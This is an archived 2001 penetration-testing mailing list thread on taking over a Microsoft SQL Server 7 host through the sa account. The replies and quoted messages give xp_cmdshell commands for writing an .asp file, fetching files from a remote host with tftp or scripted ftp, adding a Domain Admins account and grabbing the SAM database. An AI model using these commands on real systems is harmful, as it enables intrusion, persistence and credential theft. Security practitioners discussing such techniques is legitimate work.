Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: MadHat <madhat () UNSPECIFIC COM>
Date: Thu, 25 Jan 2001 14:25:41 -0600
At 01:40 PM 1/25/2001 -0500, you wrote:
If I understand your question, try: xp_cmdshell 'echo filecontent > c:\file.asp' This will create a file named 'file.asp', with the text 'filecontent' in it.
If UDP port 69 is open, you can use tftp easily xp_cmdshell 'tftp remotehost get file.asp c:\destination_file.asp' Or if you can FTP from inside, you can use FTP to grab files off of other servers from the SQL server with an ftp script. It has been a while since I played with this, so the syntax may be a little off, but basically xp_cmdshell 'echo user > script.file; echo pass >> script.file; echo bin >> script.file; echo get file.asp >> script.file; echo quit>>script.file; ftp -s:script.file remotehost' The script file is line by line what will be sent to the ftp once the connection is made, if I am not mistaken, so you need the user, the pass and whatever commands you would use... like anonymous user () here com ascii get file.asp c:\des_file.asp quit so though you can't FTP in, you might be able to FTP out.
Aaron C. Newman > -----Original Message----- > From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf > Of FiC > Sent: Thursday, January 25, 2001 4:33 AM > To: PEN-TEST () SECURITYFOCUS COM > Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7 > > > Thank you all for your valuable information. > > Is there anyway to upload/create a file in the hacked SQL SERVER > through the > system commands? I think that the machine is behind a Firewall > and even if I > start the FTP service I can't connect via ftp, and the port 139 > is not open > or its filtered. I've tried to create an .asp file with the "copy con" > command, but I can't do it through the SQL console. How can I > upload/create > an .asp file to this server? > > Thanx. > > > > Once you have access to a MSSQL 7 server via the "sa" account, > you can do > > all sorts of fun things: > > > > Run system commands: > > > > EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass > /ADD /DOMAIN" > > EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' > newuser /ADD > > /DOMAIN" > > > > You can also access the registry, send email, dump system information... > > Take a look at some of the Extended Stored Procedures in the [master] > > database with SQL Query Analyzer. Depending on the user the > server runs at > > (normally SYSTEM or Administrator), you can usually use xp_cmdshell to > > rebuild the repair disk data with rdisk /s and snag the SAM database. > > > > I will be giving a presentation at the upcoming CanSecWest conference > > covering a variety of SQL server attacks, everything from > general procedure > > exploitation to insertion techniques. At the conference, I will be > > releasing a handful of new tools, one of which exploits the RDS > component > > in new ways, allowing access to SQL servers as well as proxying > requests to > > internal systems through it. For more information on the conference, > > please see http://www.cansecwest.com, online registration should be > > available within a few weeks. > > -- > ~/ FiC /~ >
-- MadHat at unspecific.com
Current thread:
- [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)